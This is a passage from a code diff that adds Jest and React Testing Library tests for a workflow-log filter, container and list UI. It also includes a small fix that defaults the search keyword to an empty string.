aria-label', () => { + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toHaveAttribute('aria-label', 'appLog.runDetail.testWithParams') + }) + + it('should maintain proper component structure', () => { + const { container } = render() + + // Check for main container with flex layout + const mainContainer = container.querySelector('.flex.grow.flex-col') + expect(mainContainer).toBeInTheDocument() + + // Check for header section + const header = container.querySelector('.flex.items-center.bg-components-panel-bg') + expect(header).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Tooltip Tests + // -------------------------------------------------------------------------- + describe('Tooltip', () => { + it('should have tooltip on replay button', () => { + render() + + // The replay button should be wrapped in TooltipPlus + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + + // TooltipPlus wraps the button with popupContent + // We verify the button exists with the correct aria-label + expect(replayButton).toHaveAttribute('type', 'button') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.spec.tsx b/web/app/components/app/workflow-log/filter.spec.tsx new file mode 100644 index 0000000000..04216e5cc8 --- /dev/null +++ b/web/app/components/app/workflow-log/filter.spec.tsx @@ -0,0 +1,537 @@ +/** + * Filter Component Tests + * + * Tests the workflow log filter component which provides: + * - Status filtering (all, succeeded, failed, stopped, partial-succeeded) + * - Time period selection + * - Keyword search + */ + +import { useState } from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Filter, { TIME_PERIOD_MAPPING } from './filter' +import type { QueryParam } from './index' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createDefaultQueryParams = (overrides: Partial = {}): QueryParam => ({ + status: 'all', + period: '2', // default to last 7 days + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Filter', () => { + const defaultSetQueryParams = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render( + , + ) + + // Should render status chip, period chip, and search input + expect(screen.getByText('All')).toBeInTheDocument() + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + + it('should render all filter components', () => { + render( + , + ) + + // Status chip + expect(screen.getByText('All')).toBeInTheDocument() + // Period chip (shows translated key) + expect(screen.getByText('appLog.filter.period.last7days')).toBeInTheDocument() + // Search input + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Filter Tests + // -------------------------------------------------------------------------- + describe('Status Filter', () => { + it('should display current status value', () => { + render( + , + ) + + // Chip should show Success for succeeded status + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should open status dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + + // Should show all status options + await waitFor(() => { + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('Fail')).toBeInTheDocument() + expect(screen.getByText('Stop')).toBeInTheDocument() + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when status is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '2', + }) + }) + + it('should track status selection event', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Fail')) + + expect(mockTrackEvent).toHaveBeenCalledWith( + 'workflow_log_filter_status_selected', + { workflow_log_filter_status: 'failed' }, + ) + }) + + it('should reset to all when status is cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // Find the clear icon (div with group/clear class) in the status chip + const clearIcon = container.querySelector('.group\\/clear') + + expect(clearIcon).toBeInTheDocument() + await user.click(clearIcon!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + }) + }) + + test.each([ + ['all', 'All'], + ['succeeded', 'Success'], + ['failed', 'Fail'], + ['stopped', 'Stop'], + ['partial-succeeded', 'Partial Success'], + ])('should display correct label for %s status', (statusValue, expectedLabel) => { + render( + , + ) + + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Time Period Filter Tests + // -------------------------------------------------------------------------- + describe('Time Period Filter', () => { + it('should display current period value', () => { + render( + , + ) + + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + }) + + it('should open period dropdown when clicked', async () => { + const user = userEvent.setup() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + + // Should show all period options + await waitFor(() => { + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last4weeks')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.last3months')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.allTime')).toBeInTheDocument() + }) + }) + + it('should call setQueryParams when period is selected', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + }) + + it('should reset period to allTime when cleared', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + // Find the period chip's clear button + const periodChip = screen.getByText('appLog.filter.period.last7days').closest('div') + const clearButton = periodChip?.querySelector('button[type="button"]') + + if (clearButton) { + await user.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '9', + }) + } + }) + }) + + // -------------------------------------------------------------------------- + // Keyword Search Tests + // -------------------------------------------------------------------------- + describe('Keyword Search', () => { + it('should display current keyword value', () => { + render( + , + ) + + expect(screen.getByDisplayValue('test search')).toBeInTheDocument() + }) + + it('should call setQueryParams when typing in search', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const Wrapper = () => { + const [queryParams, updateQueryParams] = useState(createDefaultQueryParams()) + const handleSetQueryParams = (next: QueryParam) => { + updateQueryParams(next) + setQueryParams(next) + } + return ( + + ) + } + + render() + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'workflow') + + // Should call setQueryParams for each character typed + expect(setQueryParams).toHaveBeenLastCalledWith( + expect.objectContaining({ keyword: 'workflow' }), + ) + }) + + it('should clear keyword when clear button is clicked', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + const { container } = render( + , + ) + + // The Input component renders a clear icon div inside the input wrapper + // when showClearIcon is true and value exists + const inputWrapper = container.querySelector('.w-\\[200px\\]') + + // Find the clear icon div (has cursor-pointer class and contains RiCloseCircleFill) + const clearIconDiv = inputWrapper?.querySelector('div.cursor-pointer') + + expect(clearIconDiv).toBeInTheDocument() + await user.click(clearIconDiv!) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: '', + }) + }) + + it('should update on direct input change', () => { + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + fireEvent.change(input, { target: { value: 'new search' } }) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'all', + period: '2', + keyword: 'new search', + }) + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should have correct mapping for today', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + }) + + it('should have correct mapping for last 7 days', () => { + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + }) + + it('should have correct mapping for last 4 weeks', () => { + expect(TIME_PERIOD_MAPPING['3']).toEqual({ value: 28, name: 'last4weeks' }) + }) + + it('should have correct mapping for all time', () => { + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + }) + + it('should have all 9 predefined time periods', () => { + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + + test.each([ + ['1', 'today', 0], + ['2', 'last7days', 7], + ['3', 'last4weeks', 28], + ['9', 'allTime', -1], + ])('TIME_PERIOD_MAPPING[%s] should have name=%s and correct value', (key, name, expectedValue) => { + const mapping = TIME_PERIOD_MAPPING[key] + expect(mapping.name).toBe(name) + if (expectedValue >= 0) + expect(mapping.value).toBe(expectedValue) + else + expect(mapping.value).toBe(-1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle undefined keyword gracefully', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should handle empty string keyword', () => { + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + expect(input).toHaveValue('') + }) + + it('should preserve other query params when updating status', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'succeeded', + period: '3', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating period', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.today')) + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '1', + keyword: 'test', + }) + }) + + it('should preserve other query params when updating keyword', async () => { + const user = userEvent.setup() + const setQueryParams = jest.fn() + + render( + , + ) + + const input = screen.getByPlaceholderText('common.operation.search') + await user.type(input, 'a') + + expect(setQueryParams).toHaveBeenCalledWith({ + status: 'failed', + period: '3', + keyword: 'a', + }) + }) + }) + + // -------------------------------------------------------------------------- + // Integration Tests + // -------------------------------------------------------------------------- + describe('Integration', () => { + it('should render with all filters visible simultaneously', () => { + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('appLog.filter.period.today')).toBeInTheDocument() + expect(screen.getByDisplayValue('integration test')).toBeInTheDocument() + }) + + it('should have proper layout with flex and gap', () => { + const { container } = render( + , + ) + + const filterContainer = container.firstChild as HTMLElement + expect(filterContainer).toHaveClass('flex') + expect(filterContainer).toHaveClass('flex-row') + expect(filterContainer).toHaveClass('gap-2') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/filter.tsx b/web/app/components/app/workflow-log/filter.tsx index 0c8d72c1be..a4db4c9642 100644 --- a/web/app/components/app/workflow-log/filter.tsx +++ b/web/app/components/app/workflow-log/filter.tsx @@ -65,7 +65,7 @@ const Filter: FC = ({ queryParams, setQueryParams }: IFilterProps) wrapperClassName='w-[200px]' showLeftIcon showClearIcon - value={queryParams.keyword} + value={queryParams.keyword ?? ''} placeholder={t('common.operation.search')!} onChange={(e) => { setQueryParams({ ...queryParams, keyword: e.target.value }) diff --git a/web/app/components/app/workflow-log/index.spec.tsx b/web/app/components/app/workflow-log/index.spec.tsx new file mode 100644 index 0000000000..e6d9f37949 --- /dev/null +++ b/web/app/components/app/workflow-log/index.spec.tsx @@ -0,0 +1,592 @@ +/** + * Logs Container Component Tests + * + * Tests the main Logs container component which: + * - Fetches workflow logs via useSWR + * - Manages query parameters (status, period, keyword) + * - Handles pagination + * - Renders Filter, List, and Empty states + * + * Note: Individual component tests are in their respective spec files: + * - filter.spec.tsx + * - list.spec.tsx + * - detail.spec.tsx + * - trigger-by-display.spec.tsx + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import useSWR from 'swr' +import Logs, { type ILogsProps } from './index' +import { TIME_PERIOD_MAPPING } from './filter' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +jest.mock('swr') + +jest.mock('ahooks', () => ({ + useDebounce: (value: T) => value, + useDebounceFn: (fn: (value: string) => void) => ({ run: fn }), + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: jest.fn(), + }), +})) + +jest.mock('next/link', () => ({ + __esModule: true, + default: ({ children, href }: { children: React.ReactNode; href: string }) => {children}, +})) + +// Mock the Run component to avoid complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +const mockTrackEvent = jest.fn() +jest.mock('@/app/components/base/amplitude/utils', () => ({ + trackEvent: (...args: unknown[]) => mockTrackEvent(...args), +})) + +jest.mock('@/service/log', () => ({ + fetchWorkflowLogs: jest.fn(), +})) + +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + userProfile: { timezone: 'UTC' }, + }), +})) + +// Mock useTimestamp +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +const mockedUseSWR = useSWR as jest.MockedFunction + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('Logs Container', () => { + const defaultProps: ILogsProps = { + appDetail: createMockApp(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + }) + + it('should render title and subtitle', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any pagination-related element + // The Pagination component renders page controls + expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
    BlockIcon
    , +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + 